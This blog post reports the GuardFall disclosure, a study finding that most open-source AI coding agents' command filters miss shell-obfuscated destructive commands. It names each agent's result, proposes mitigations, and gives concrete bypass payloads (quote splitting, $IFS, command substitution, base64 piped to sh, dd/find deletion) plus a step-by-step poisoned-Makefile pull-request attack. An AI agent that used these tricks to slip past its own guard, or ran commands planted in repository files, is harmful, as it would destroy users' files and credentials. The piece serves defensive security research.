GuardFall: 10 of 11 Open-Source AI Coding Agents Fail a 30-Year-Old Shell Trick

Table of Contents

Adversa AI — the same research group behind May’s TrustFall and SymJack disclosures — is back with a third finding, and this one is almost embarrassing in how old the trick is. Published June 30, GuardFall shows that 10 of 11 popular open-source AI coding agents can be talked into running a command their safety filter was explicitly designed to block, using command-injection techniques that predate most of the developers who wrote those filters.

The root cause is a one-sentence architectural mismatch: the guard inspects the raw command string, but bash rewrites that string before executing it. A filter that blocks the literal text rm -rf has no idea what to do with a string that only becomes rm -rf after the shell finishes expanding quotes, variables, and substitutions. By the time the dangerous command actually runs, the safety check is looking at a different, older version of reality.

Five Ways to Say “rm -rf” Without Saying It
#

Adversa AI’s paper documents five distinct bypass classes, and none of them require anything beyond a standard POSIX shell:

Quote splitting — r''m reads as two harmless tokens to a naive regex, but bash strips the empty quotes and executes rm.
$IFS expansion — the shell’s Internal Field Separator variable expands to whitespace, so rm$IFS-rf$IFS/ sails past filters that only look for a literal space character.
Command substitution — $(echo rm) -rf /, or a destructive command nested inside echo "$(rm /etc/x)", hides the payload inside an evaluation context the guard doesn’t unwrap.
Base64 pipelines — echo <base64> | base64 -d | sh defeats any filter that analyzes commands segment-by-segment, since the dangerous content only exists after the pipeline composes.
Alternative destructive utilities — find /x -delete, dd of=/dev/sda, tar -C / -x achieve the same outcome as rm -rf without ever containing the string rm.

None of these are new to offensive security — they’re straight out of decades-old CTF and shell-scripting lore. What’s new is that they’re now sufficient to defeat the safety layer of tools that read your codebase and execute commands with your account’s full privileges.

Who Failed, Who Didn’t
#

Adversa AI live-tested production binaries of 11 agents, representing roughly 548,000 combined GitHub stars, and sorted the results into four failure modes:

Failure mode	Agents	What happened
Regex matches raw, unprocessed string	Hermes, opencode, Goose	Failed all five bypass classes; Goose leaked 22 of 23 test cases, opencode leaked 16 of 16
Tokenizes, but still reasons about raw text	Cline, Roo-Code	Better, but still fails on quoted substitutions and per-flag reasoning; Cline leaked 2 of 13 in allow+deny mode
No static guard at all	Aider, Plandex, Open Interpreter	Relies entirely on human approval — defeated the moment auto-execute flags are enabled, which CI pipelines do routinely
Sandbox-only, with a documented opt-out	OpenHands, SWE-agent	Containers work when active, but a documented local-mode flag removes the containment entirely

Continue was the only agent that held up, passing all 24 penetration attempts with zero leaks. Its approach is unglamorous but correct: tokenize the command the way bash’s own quoting rules would, detect variable expansion, recursively evaluate command substitutions, check where pipes actually terminate, and keep an explicit deny-list of canonical destructive patterns evaluated after that normalization — not before it.

The Attack in Practice
#

The paper’s proof-of-concept is the part worth internalizing, because it doesn’t require tricking anyone into typing a suspicious command. It requires a pull request:

An attacker submits a PR containing a poisoned Makefile, with a clean target that runs rm -rf "$$HOME/.aws/credentials".
A developer’s agent reads the Makefile — completely normal, unremarkable behavior for any coding agent.
The agent later runs make test, which depends on clean as a prerequisite.
With auto-execute enabled (the default in most CI configurations), the destructive command runs with no filter catching it, because the guard never saw the literal string rm -rf — it saw a make invocation.

This is the same supply-chain shape as May’s TrustFall/Miasma story: you don’t need to compromise the developer’s judgment, you need to compromise a file the agent is going to read as a matter of course.

Where Does Claude Code Fit In?
#

Notably, Claude Code isn’t on Adversa AI’s tested list — the survey selected purely by open-source GitHub stars, and Claude Code is closed-source. That’s worth being honest about rather than claiming an unearned pass: the underlying architectural question — “does the guard reason about the command bash will actually run, or the command text it was handed?” — applies to any agent with a text-based permission layer, proprietary or not. Anthropic’s own trust-dialog design has been criticized before (Claude Code was one of four agents affected by TrustFall in May, and Anthropic’s response was to call the one-keypress RCE pattern within its stated threat model rather than a bug).

What GuardFall does reinforce is the direction Claude Code has been moving since v2.1.187’s sandbox.credentials: away from pattern-matching specific commands and toward deny-by-default access control over resources (credential files, specific directories) regardless of how a command is spelled. A filter that blocks reads of ~/.aws/credentials at the filesystem layer doesn’t care whether the command that tried to read it was cat, dd, or a base64-decoded pipeline — it never had to parse the command text correctly in the first place. That’s a structurally stronger guarantee than any command-string blocklist, however well-tokenized, because it doesn’t depend on enumerating every way bash can be asked to do something.

What to Actually Do About It
#

If you or your team run any of the ten vulnerable agents, Adversa AI’s mitigations are worth applying this week, not this quarter:

Redirect $HOME to a throwaway sandbox directory before running the agent, so ~/.ssh and ~/.aws are structurally out of reach regardless of what the guard does or doesn’t catch.
Disable auto-execute flags (--auto-exec, --auto-run, --auto-test and equivalents) unless the workflow is genuinely non-interruptible — most CI configurations enable these by default without anyone revisiting the decision.
Block agent execution on pull requests from forks. The Makefile scenario above requires nothing more than an accepted external PR.
Treat repository configuration files as untrusted input — Makefile, .aider.conf.yml, package.json scripts, and CI YAML are all attacker-reachable the moment your agent reads them.

Longer term, Adversa AI’s advice generalizes past this specific research: don’t trust a command filter that was never tested against the five bypass classes above, and prefer tools that enforce access control at the resource level over ones that try to out-parse bash at the string level. Bash has been rewriting strings before executing them since the 1970s. Any safety layer built after that fact and still losing to it isn’t a bug to patch — it’s a design assumption to retire.

Sources: Adversa AI — GuardFall disclosure · The Hacker News — GuardFall coverage · Security Affairs — GuardFall flaw hits 10 of 11 agents · SC Media — shell injection flaw brief · Mallory — GuardFall story

Five Ways to Say “rm -rf” Without Saying It#

Who Failed, Who Didn’t#

The Attack in Practice#

Where Does Claude Code Fit In?#

What to Actually Do About It#

Related

Five Ways to Say “rm -rf” Without Saying It
#

Who Failed, Who Didn’t
#

The Attack in Practice
#

Where Does Claude Code Fit In?
#

What to Actually Do About It
#